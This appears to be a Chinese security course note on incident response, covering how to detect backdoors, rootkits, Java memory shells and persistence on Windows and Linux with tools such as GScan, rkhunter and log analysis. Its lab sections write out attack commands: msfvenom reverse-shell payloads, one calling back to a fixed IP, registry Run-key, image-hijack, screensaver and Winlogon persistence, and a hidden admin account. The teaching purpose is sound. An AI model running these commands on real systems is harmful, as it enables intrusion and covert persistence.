第163天：应急响应-后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux

知识点

#知识点
-网页篡改与后门攻击防范应对指南
主要需了解：异常特征，处置流程，分析报告等
主要需了解：日志存储，Webshell检测，分析思路等
掌握：
中间件日志存储，日志格式内容介绍（IP,UA头,访问方法,请求文件,状态码等）
Webshell查杀（常规后门，内存马（单独还有））
分析思路：基于时间，基于漏洞，基于后门筛选（还有）

#内容点：
应急响应：
1、抗拒绝服务攻击防范应对指南
2、勒索软件防范应对指南
3、钓鱼邮件攻击防范应对指南
4、网页篡改与后门攻击防范应对指南
5、网络安全漏洞防范应对指南
6、大规模数据泄露防范应对指南
7、僵尸网络感染防范应对指南
8、APT攻击入侵防范应对指南
9、各种辅助类分析工具项目使用
朔源反制：
威胁情报，信息库追踪，设备反制，IDS&IPS等反制，工具漏洞反制，蜜罐钓鱼反制等

演示案例：

1、Windows-后门-常规&权限维持&内存马

2、Linux-后门-常规&权限维持&Rootkit&内存马

Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合：
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门：
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试：
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隐藏账户：
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"

Linux实验
1、常规MSF后门-分析检测
2、Rootkit后门-分析检测
3、权限维持后门-分析检测
4、Web程序内存马-分析检测
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门：
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
Rootkit后门：GScan rkhunter 
权限维持后门：GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz 
cd rkhunter-1.4.6 
./installer.sh --layout default --install
rkhunter -c

Web层面：通用系统层面
1、常规后门
2、内存马（无文件马）
    PHP
    .NET
    JAVA
    Python

总结

1、对于系统层面的后门：
1.1、windows
对于常规MSF后门，其一般会有网络外连的情况，可使用火绒剑、PCHunter工具查看网络，针对网络外连的进行逐一排查
对于权限维持后门，比如自启动、映像劫持，在火绒剑、PCHunter里也有对应的栏目，也可逐一排查

1.2、linux
对于常规MSF后门，其一般会有网络外连的情况，可使用命令：netstat -anpt  针对网络外连的进行逐一排查
对于Rootkit、权限维持后门，可使用工具GScan、rkhunter进行排查

2、对于Web层面的后门：
2.1、普通Web后门
基于客户反映的情况，我们拿到的信息可能是时间、漏洞，也可能什么也没有。
如果有大概时间信息，那么可以通过时间筛选日志，看IP、请求地址、UA头、响应码等定位攻击，再锁定该IP看有无其他行为
如果只知道框架信息，那么就根据框架可能存在的漏洞，复现一遍，查看新产生的日志拿到攻击指纹信息，然后以此筛选日志，定位攻击
如果没有任何信息，那么先使用后门查杀工具锁定后门，看哪个IP在访问该后门，然后针对该IP筛选日志，定位攻击

2.2、内存马
PHP内存马其实是进程马，只要把对应进程停掉，删除后就没了；Java内存马才是真正意义上的内存马
Java内存马根据不同的Java中间件有不同的实现方式，比如Tomcat的内存马主要有Servlet、Filter、Listener、Tomacat Valve
使用工具查杀Java内存马：
河马的内存马查杀工具（优点：适用多种中间件的内存马；缺点：易出Bug，不支持直接Dump或Kill）
脚本 tomcat-memshell-scanner.jsp（优点：好用，支持直接Dump或Kill；缺点：只支持Tomcat的内存马）